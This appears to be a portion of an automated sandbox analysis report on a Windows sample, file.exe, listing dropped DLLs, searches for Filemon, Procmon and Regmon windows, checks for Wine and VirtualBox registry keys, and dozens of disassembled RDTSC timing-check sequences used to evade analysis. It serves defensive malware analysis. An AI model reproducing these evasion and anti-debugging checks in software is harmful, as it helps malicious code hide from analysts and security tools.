Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Bunifu_UI_v1.5.3.dll

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC435 second address: 9AC439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC439 second address: 9AC49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FEEE0EE3612h 0x00000011 pushad 0x00000012 jl 00007FEEE0EE3606h 0x00000018 jmp 00007FEEE0EE3618h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 jmp 00007FEEE0EE3613h 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a pop edx 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 pop edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC49D second address: 9AC4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC4A3 second address: 9AC504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dword ptr [ebp+122D2D6Bh], edi 0x0000000f mov ecx, dword ptr [ebp+122D2948h] 0x00000015 push 00000003h 0x00000017 add edi, 0EF888E9h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FEEE0EE3608h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 push esi 0x0000003a jmp 00007FEEE0EE3611h 0x0000003f pop esi 0x00000040 push 00000003h 0x00000042 mov dword ptr [ebp+122D26A1h], edi 0x00000048 push 9014A48Dh 0x0000004d push edi 0x0000004e push ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC6BD second address: 9AC6D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A2310h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC6D1 second address: 9AC719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c je 00007FEEE0EE361Bh 0x00000012 pushad 0x00000013 jmp 00007FEEE0EE3611h 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 pushad 0x00000021 jg 00007FEEE0EE3606h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC719 second address: 9AC72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FEEE08A2306h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC72B second address: 9AC735 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEEE0EE3606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBA14 second address: 9CBA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBBBE second address: 9CBBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEEE0EE3606h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBBCE second address: 9CBBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBFA3 second address: 9CBFC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3612h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEEE0EE360Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBFC8 second address: 9CBFDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC126 second address: 9CC130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD27 second address: 9CCD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD2B second address: 9CCD5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FEEE0EE3617h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD5F second address: 9CCD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD69 second address: 9CCD75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCEC0 second address: 9CCECA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEE08A230Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF451 second address: 9CF46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE3616h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF46C second address: 9CF472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF472 second address: 9CF476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF476 second address: 9CF47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFADF second address: 9CFAE9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEEE0EE360Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE9A6 second address: 9CE9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE9AD second address: 9CE9B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFDB2 second address: 9CFDB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 991169 second address: 991179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pushad 0x00000008 ja 00007FEEE0EE3606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7133 second address: 9D7142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FEEE08A2308h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7142 second address: 9D7173 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEEE0EE361Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEEE0EE3610h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7173 second address: 9D7177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7177 second address: 9D717B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D76F2 second address: 9D76F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D76F8 second address: 9D76FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAF13 second address: 9DAF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAF17 second address: 9DAF1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAF1D second address: 9DAF45 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 791BE696h 0x00000013 mov edi, dword ptr [ebp+122D25FEh] 0x00000019 call 00007FEEE08A2309h 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 push esi 0x00000022 pop esi 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAF45 second address: 9DAFA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEEE0EE360Fh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FEEE0EE360Bh 0x00000018 mov eax, dword ptr [eax] 0x0000001a jns 00007FEEE0EE361Eh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FEEE0EE360Ch 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB08A second address: 9DB090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB294 second address: 9DB298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBB7E second address: 9DBB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE08A2318h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBC88 second address: 9DBCA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEEE0EE360Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBD6F second address: 9DBD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBEED second address: 9DBEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBFA5 second address: 9DBFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC124 second address: 9DC13C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007FEEE0EE3606h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jc 00007FEEE0EE360Eh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC67B second address: 9DC67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE7A second address: 9DCE7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE7E second address: 9DCE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE8C second address: 9DCE90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE90 second address: 9DCE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF555 second address: 9DF55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF5E8 second address: 9DF5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF2DD second address: 9DF2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF2E4 second address: 9DF312 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FEEE08A2306h 0x00000009 jmp 00007FEEE08A2313h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FEEE08A230Ch 0x0000001a jg 00007FEEE08A2306h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF312 second address: 9DF318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFED9 second address: 9DFEE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FEEE08A230Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF318 second address: 9DF31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E166C second address: 9E1670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1670 second address: 9E1676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1676 second address: 9E1698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1F2A second address: 9E1F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1F30 second address: 9E1F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1F34 second address: 9E1F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6C11 second address: 9E6C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FEEE08A2308h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2B40h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FEEE08A2308h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov di, 1FE0h 0x0000004a push 00000000h 0x0000004c xchg eax, esi 0x0000004d jmp 00007FEEE08A2311h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FEEE08A230Dh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5ECD second address: 9E5EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FEEE0EE360Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5EEB second address: 9E5EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5EEF second address: 9E5EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6ED1 second address: 9E6EE8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEE08A230Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7DCC second address: 9E7DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7F10 second address: 9E7F19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8F0C second address: 9E8F16 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEE0EE3606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8F16 second address: 9E8F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAE9C second address: 9EAEA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA134 second address: 9EA154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007FEEE08A2315h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA206 second address: 9EA20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBDB6 second address: 9EBDF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEE08A230Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e movsx edi, si 0x00000011 push 00000000h 0x00000013 or ebx, dword ptr [ebp+122D301Bh] 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c or ch, 00000001h 0x0000001f mov dword ptr [ebp+122D232Ch], esi 0x00000025 popad 0x00000026 mov dword ptr [ebp+122D305Ah], edi 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 pop edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDE1A second address: 9EDE33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FEEE0EE3606h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jno 00007FEEE0EE3608h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDE33 second address: 9EDE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ECF46 second address: 9ECF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 jo 00007FEEE0EE3614h 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FEEE0EE3606h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFE45 second address: 9EFE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FEEE08A2306h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FEEE08A2308h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3621h], esi 0x0000002e push 00000000h 0x00000030 mov bl, 21h 0x00000032 push 00000000h 0x00000034 xor dword ptr [ebp+122D1928h], edx 0x0000003a mov edi, dword ptr [ebp+122D2B30h] 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push esi 0x00000045 pop esi 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0EE1 second address: 9F0EE7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0EE7 second address: 9F0F0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007FEEE08A2306h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE08A2317h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1D74 second address: 9F1D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F10A1 second address: 9F10A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EEFD1 second address: 9EEFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
